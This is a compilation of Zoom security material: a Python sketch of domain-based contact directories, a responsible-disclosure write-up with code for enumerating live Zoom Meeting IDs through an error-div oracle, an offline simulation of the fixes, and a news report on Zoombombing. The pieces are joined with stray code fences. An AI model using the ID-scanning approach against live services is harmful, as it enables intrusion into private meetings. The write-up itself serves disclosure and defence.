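from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

User = Tuple[str, str]   # (display name, e-mail address)

# Constructed sign-ups (assumed data).
USERS: List[User] = [
    ("alice", "alice@example-corp.com"),
    ("bob", "bob@example-corp.com"),
    ("carol", "carol@gmail.com"),
    ("dave", "dave@gmail.com"),
    ("erik", "erik@xs4all.nl"),
    ("femke", "femke@xs4all.nl"),
    ("gijs", "gijs@dds.nl"),
]

# Denylist approach: a hand-maintained list of "public" providers.
PUBLIC_DOMAINS: Set[str] = {"gmail.com", "yahoo.com", "hotmail.com"}
# Allowlist approach: only domains an organisation has proven it owns
# (e.g. via a DNS record or an admin-managed account) form a directory. Assumed.
VERIFIED_ORG_DOMAINS: Set[str] = {"example-corp.com"}


def domain_of(email: str) -> str:
    return email.rsplit("@", 1)[1].lower()


def _group_by_domain(users: Iterable[User]) -> Dict[str, List[str]]:
    groups: Dict[str, List[str]] = defaultdict(list)
    for name, email in users:
        groups[domain_of(email)].append(name)
    return groups


def directory_by_denylist(users: Iterable[User], denylist: Set[str] = PUBLIC_DOMAINS) -> Dict[str, List[str]]:
    """Everyone sharing a domain is grouped unless the domain is denylisted.
    Any domain missing from the list is treated as a company."""
    return {d: names for d, names in _group_by_domain(users).items() if d not in denylist}


def directory_by_allowlist(users: Iterable[User], allowlist: Set[str] = VERIFIED_ORG_DOMAINS) -> Dict[str, List[str]]:
    """Only verified organisation domains form a directory; an unknown
    domain gets no group at all, so the failure mode is an empty list."""
    return {d: names for d, names in _group_by_domain(users).items() if d in allowlist}


def visible_contacts(directory: Dict[str, List[str]], name: str, email: str) -> List[str]:
    """What one user sees: everyone on their domain except themselves."""
    return [n for n in directory.get(domain_of(email), []) if n != name]


def exposure_count(directory: Dict[str, List[str]]) -> int:
    """Number of (viewer, exposed user) pairs the directory creates."""
    return sum(len(names) * (len(names) - 1) for names in directory.values())


if __name__ == "__main__":
    for label, build in (("denylist", directory_by_denylist), ("allowlist", directory_by_allowlist)):
        d = build(USERS)
        print(label, "exposed pairs:", exposure_count(d),
              "| erik sees:", visible_contacts(d, "erik", "erik@xs4all.nl"))
```

With the denylist, erik@xs4all.nl sees a stranger on the same ISP; with the allowlist he sees nobody, and only the verified example-corp.com users are grouped. Adding xs4all.nl and dds.nl to the denylist, as Zoom says it did, fixes those two domains and nothing else.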
In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.
All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.
The Problem
If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you had not enabled the “Require meeting password” option or the Waiting Room (which lets the host admit participants manually), those 9, 10 or 11 digits were the only thing securing your meeting, i.e. the only thing preventing an unauthorized person from connecting to it. A space of roughly 10^9 to 10^11 values is far too small to act as a secret when the service will tell you which values are live.
Let Me Guess…
The first thing we did was pre-generate a list of potentially valid Zoom Meeting IDs: 1000 “random” Meeting IDs, each already formatted as the URL used to join the meeting:
from random import randint

urls = []
for _ in range(1000):
    # 9- or 10-digit candidates; 11-digit IDs would need an upper bound of 99999999999
    urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))
But how could we tell whether a Meeting ID corresponded to a live meeting? We found a fast and easy check based on the following “div” element (div#join-errormsg) present in the HTML body of the response returned when requesting the “Join Meeting” URL (https://zoom.us/j/{MEETING_ID}):
I Found It!
We then automated the approach (in case you don’t want to brute force all the Meeting IDs by hand):
# Scrapy-style crawl: one request per candidate URL, parsed by parseResponse
for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback):
    …

def parseResponse(response):
    # The join page carries div#join-errormsg only for IDs that are not live
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')
…and look at the output:
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID
Bingo!
Results
Roughly 4% of the randomly generated Meeting IDs turned out to be live meetings, which is a very high hit rate compared to pure brute force: about one valid meeting for every 25 guesses.
Mitigation
We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the Meeting ID generation algorithm.
2. Replace the randomization function with a cryptographically strong one.
3. Increase the number of digits/symbols in Meeting IDs.
4. Force hosts to use passwords/PINs/SSO for authorization.
Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes introduced to the Zoom client/infrastructure following our disclosure:
Passwords are added by default to all future scheduled meetings.
Password settings are enforceable at the account level and group level by the account admin.
Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.
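The guessing loop above, and the effect of the last two changes in this list (no validity oracle; blocking a client that keeps scanning), as an added Python example run offline against a simulated join endpoint. This is neither Check Point's scanner nor Zoom's server: the SimulatedJoinEndpoint class, the set of "live" meeting IDs, the candidate pool (rigged so that 3 of 100 guesses are live, approximating the ~4% figure) and the block threshold of 20 attempts are all assumptions made for the simulation.

```python
"""Added example: the ID-guessing loop from the write-up run against a
simulated /j/{id} endpoint, before and after two mitigations (same page
for valid and invalid IDs; cut off a scanning client).
Not Check Point's scanner and not Zoom's server; every ID is made up."""
import random
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set

ID_RANGE = (100_000_000, 99_999_999_999)        # 9 to 11 digits, as the write-up describes
# Constructed set of "live" meetings so the simulation finishes instantly.
ACTIVE_MEETINGS: Set[int] = {223_414_188, 8_555_344_449, 93_111_911_195}


class DivIdFinder(HTMLParser):
    """Collects div ids in a page; the original check keyed on div#join-errormsg."""

    def __init__(self) -> None:
        super().__init__()
        self.ids: Set[str] = set()

    def handle_starttag(self, tag, attrs):
        if tag == "div":
            div_id = dict(attrs).get("id")
            if div_id:
                self.ids.add(div_id)


def div_ids(html: str) -> Set[str]:
    finder = DivIdFinder()
    finder.feed(html)
    return finder.ids


class SimulatedJoinEndpoint:
    """Hypothetical join handler. leaks_validity=True reproduces the pre-fix
    behaviour (an error div for unknown IDs); block_after caps the join
    attempts one client may make before it is cut off."""

    def __init__(self, leaks_validity: bool, block_after: Optional[int] = None) -> None:
        self.leaks_validity = leaks_validity
        self.block_after = block_after
        self.attempts: Dict[str, int] = {}

    def join_page(self, client: str, meeting_id: int) -> str:
        self.attempts[client] = self.attempts.get(client, 0) + 1
        if self.block_after is not None and self.attempts[client] > self.block_after:
            return '<html><body><div id="blocked">Too many attempts</div></body></html>'
        if self.leaks_validity and meeting_id not in ACTIVE_MEETINGS:
            return '<html><body><div id="join-errormsg">Invalid meeting ID</div></body></html>'
        # Post-fix: valid and invalid IDs get the same "joining..." page.
        return '<html><body><div id="join-form">Joining meeting...</div></body></html>'


def candidate_ids(n: int, seed: int) -> List[int]:
    """Constructed candidate pool: the live IDs mixed into random draws."""
    rng = random.Random(seed)
    pool = sorted(ACTIVE_MEETINGS) + [rng.randint(*ID_RANGE) for _ in range(n - len(ACTIVE_MEETINGS))]
    rng.shuffle(pool)
    return pool


def scan(endpoint: SimulatedJoinEndpoint, client: str, n: int = 100, seed: int = 0) -> Dict[str, object]:
    """Same decision rule as the original parseResponse: no join-errormsg div
    means 'valid'. Stops once the endpoint serves the blocked page."""
    reported: List[int] = []
    requests = 0
    for meeting_id in candidate_ids(n, seed):
        requests += 1
        ids = div_ids(endpoint.join_page(client, meeting_id))
        if "blocked" in ids:
            break
        if "join-errormsg" not in ids:
            reported.append(meeting_id)
    true_positives = len(set(reported) & ACTIVE_MEETINGS)
    return {"reported": reported, "true_positives": true_positives, "requests": requests}


if __name__ == "__main__":
    before = scan(SimulatedJoinEndpoint(leaks_validity=True), "scanner")
    after = scan(SimulatedJoinEndpoint(leaks_validity=False, block_after=20), "scanner")
    print("before:", before)
    print("after: ", after)
```

Against the leaking endpoint the scanner recovers exactly the live IDs. Against the hardened one every response looks the same, so the "valid" list is mostly noise, and the client is cut off after 20 attempts; the attacker would now have to actually attempt each join, which the per-meeting password then stops.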
The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.
Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.
Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.
On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.
A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.
This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that although the service claims to offer end-to-end encryption for video meetings, it actually uses transport encryption, so Zoom itself can access the unencrypted audio and video content of meetings. (The Intercept noted that, unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law-enforcement requests for data it receives or how many it complies with.)
Zoom also recently pushed an update to remove code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is currently the subject of a class-action lawsuit, though whether the suit is viable is another question. Last year Zoom also eventually caved and patched a “click-to-join” feature that installed an insecure local web server on Macs; the server was not removed when the app was uninstalled, allowing a web page to remotely open the webcam of any Mac with a current or previous Zoom installation. The company had initially defended it as a convenience feature.
“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”